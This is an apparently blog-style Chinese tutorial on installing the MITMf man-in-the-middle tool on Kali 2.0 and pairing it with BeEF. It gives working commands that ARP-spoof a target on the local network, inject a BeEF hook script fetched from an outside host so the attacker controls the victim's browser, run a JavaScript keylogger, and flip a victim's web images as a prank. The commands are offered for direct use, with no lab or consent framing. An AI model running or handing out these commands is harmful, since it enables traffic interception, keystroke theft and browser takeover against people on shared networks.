Mitmf 是一款用來進行中間人攻擊的工具。它可以結合 beef 一起來使用,並利用 beef 強大的 hook 腳本來控制目標客戶端。下面讓我們一起看看如何在 Kali2.0上安裝使用 Mitmf 。默認在2.0上並未安裝,在之前的版本有安裝。
首先,我們先進行工具依賴包的安裝。打開 terminal 終端,輸入如下命令:
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
以上結果出現一些安裝包無法安裝的情況,這里我們無需理會,繼續我們的下一步操作即可。
依賴包安裝完成后,就可以開始安裝Mitmf 了、輸入命令:
apt-get install mitmf
不過這樣安裝完成后 mitmf 依然無法正常使用它的一些功能。因為缺少了 twisted 的版本兼容性。我們來安裝適合 mitmf 的 twisted 。如果你已經安裝過,那么先卸載之前的版本。輸入命令:
pip uninstall twisted
並用 wget 命令進行下載。
wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
安裝 twisted 。
pip install ./Twisted-15.5.0.tar.bz2
這樣,我們就可以正常使用 mitmf 了。
下面讓我們運行 beef 來調用 beef 強大的 hook 腳本。首先我們進入beef目錄並啟動它。
cd /usr/share/beef-xss
./beef
我們在瀏覽器打開UI界面后,下面我們就用 mitmf 進行中間人攻擊。輸入如下命令:
mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.100 –inject –s-url http://192.168.15.131:3000/hook.js
這條命令的原理是,利用ARP進行地址欺騙,讓局域網中的其他電腦,誤認為Kali為網關路由。當目標機器打開;瀏覽器,就會被注入 hook 腳本。之后便可在beef上進行客戶端的控制。
mitmf 不僅能和 beef來結合使用。自身還有許多強大的功能。例如軟件自帶的 鍵盤記錄功能。輸入命令:
mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.100–jskeylogger
最后,在介紹個mitmf 一個有趣的惡搞功能。它可以使目標瀏覽網頁時,所有的圖片都倒轉 180度。是不是很有意思!
mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.100 –upsidedownternet
